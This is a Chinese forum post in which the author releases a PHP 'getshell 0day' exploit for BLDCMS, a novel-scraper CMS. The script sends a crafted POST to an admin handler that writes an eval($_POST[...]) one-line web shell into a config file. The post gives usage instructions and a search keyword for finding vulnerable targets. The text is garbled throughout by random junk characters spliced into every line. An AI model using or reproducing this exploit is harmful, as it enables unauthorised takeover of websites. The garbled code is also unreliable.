之前想搞一个黑阔站 发现旁站有一个站用了BLDCMS 我就下载看了.. 找到了一个getshell漏洞
5 B9 R" R7 E0 d' q+ O) P% P
o( P+ C) F4 |, N. K , g& t+ ]( n" G% Q
话说昨晚晴天小铸在90sec发现有人把这getshell漏洞的分析发出来了 擦 居然被人先发了
9 A5 Z. F: z5 r5 i 7 \. ~, \: s5 h+ p- n' v$ C
既然都有人发了 我就把我之前写好的EXP放出来吧
# x% p! |7 d5 J' d/ r , R' W& c( C2 r0 d$ @
view source print?01.php;">% H2 @% B4 ]* o* u* q
02.<!--?php! b: D$ Y# b' S3 b2 z7 b
03.echo "-------------------------------------------------------------------, t& B2 |" G7 M( h% D& Y, [1 S5 w
04.
$ d( m$ \) U } p: Z, r05.------------\r\n BLDCMS(白老大php小说小偷) GETSHELL 0DAY EXP
7 H' g( k/ z$ N" l6 d' R& H06.
% G0 l M, o; t# Z07.(GPC=Off)\r\n Vulnerability discovery&Code by 数据流@wooyun# h; c9 @+ t* a: \
08. - j( W; D6 j- B! E* y
09.QQ:981009941\r\n 2013.3.21\r\n
; W+ G9 b' e5 J4 n10. 9 o* D& w. Z3 |0 q% e
11. 0 `" j G5 n. P+ p$ b2 v' t9 ]
12.用法:php.exe EXP.php www.baidu.com /cms/ pass(一句话密码
4 ~; ] Q8 D5 i7 ]$ l3 w13. 5 ?7 t* T/ p9 L* e
14.)\r\n 搜索关键字:\"开发者: 白老大小说\"\r\n-----------
0 d( o; C2 q/ {+ e15.
_4 o7 [, `9 i' J6 }16.--------------------------------------------------------------------\r\n";% a+ y" z$ Y, U3 j. v7 Y G
17.$url=$argv[1];1 w4 d- R( Z' @6 \
18.$dir=$argv[2];
x" O4 W9 k2 F1 n w" p19.$pass=$argv[3];
7 M& F% R& K, V20.$eval='\';eval($_POST['.'"'.$pass.'"'.']);\'';
# W# e) k: ^' a21.if (emptyempty($pass)||emptyempty($url))* t, x4 S% W, K. X
22.{exit("请输入参数");}6 A; ?$ x `2 o: ? J) ~ U
23.else/ g8 c. p4 D3 B; _# h
24.{; _) l8 h5 ] n" P. a% R5 k
25.$fuckdata='sitename=a&qq=1&getcontent=acurl&tongji=a&cmsmd5=1&sqlite='.$ev
8 A I6 E! j0 f2 D( y1 U1 a/ J; T26. ) d4 e( }) T, h
27.al;
+ a$ s& h" |7 F- ]28.$length = strlen($fuckdata);
$ T& ?7 q7 u& J# x29.function getshell($url,$pass)
# ~; ~& H& Z6 G; U, t M/ V30.{
+ K4 ]# r( x. ]# Q/ G& o31.global $url,$dir,$pass,$eval,$length,$fuckdata;6 g; J0 e {$ O# L1 k! M
32.$header = " OST /admin/chuli.php?action=a_1 HTTP/1.1\r\n";
! [8 o- L# w" A! F: {5 Q& Y) \33.$header .= "Content-Type: application/x-www-form-urlencoded\r\n"; H8 n W3 X, f/ H& X
34.$header .= "User-Agent: MSIE\r\n";
- G H6 j& R# o) s) P& C' o8 n35.$header .= "Host:".$url."\r\n";
. N: e X/ C5 @$ M36.$header .= "Content-Length: ".$length."\r\n";! O! J/ ~) R( f" A- t5 Q/ C |+ Y
37.$header .= "Connection: Close\r\n";- ~9 Q, z6 Y9 z
38.$header .="\r\n";8 @: x- K x- [! a, J
39.$header .= $fuckdata."\r\n\r\n";4 e2 d: d. C- O8 a- y
40.$fp = fsockopen($url, 80,$errno,$errstr,15);
/ f O5 j: s- L* t! D' [/ R0 q. G! b41.if (!$fp); S8 ]: R8 B @
42.{
, r: x" [; |4 J* k2 ~43.exit ("利用失败:请检查指定目标是否能正常打开");. p1 N2 C3 o+ e2 Y9 a% d
44.}
7 {' q' s# q/ b* q4 Q6 o45.else{ if (!fputs($fp,$header))
* b) t* n% \) h5 J46.{exit ("利用失败");}0 W0 Z$ s( K& V2 c+ \8 b/ |0 Q! D
47.else
( ^; ~& N6 D7 n48.{- Z6 a. ?6 v$ [9 Q! [% z, B7 s! M
49.$receive = '';' U \; p/ \" M
50.while (!feof($fp)) {
& }: x& i( p+ w1 Y! U51.$receive .= @fgets($fp, 1000);- Y& T- q: C1 ?3 q
52.}
P* @% a! ?" V4 B' l53.@fclose($fp);6 W: b0 N' O+ N; |/ v) w, f
54.echo "$url/$dir/conn/config/normal2.php pass pass(如连接失败 请检查目标1 F8 D2 l6 U7 T# F' a
55.
# Q. g+ v- T1 L q- |; y56.GPC是否=off)";+ [- [% {7 m2 p, A& ]
57.}}8 W' ]' I# [% a6 u! P# m
58.}
h4 y$ g8 l. v! q1 r' n/ a59.}
; A+ I9 W4 K5 K, B$ f' \1 \" b60.getshell($url,$pass); m h3 g# h& k" R; C( H% O3 I3 f3 _1 n
61.?-->9 b& p( Y( _+ C
# B) S3 R; q, d. w& G
) z4 P/ g5 R# ] y
' R: D" D. s: p" K. @) Q' h: N7 }; Q- Q; A
by 数据流
$ J% S* g3 M: g; |. u |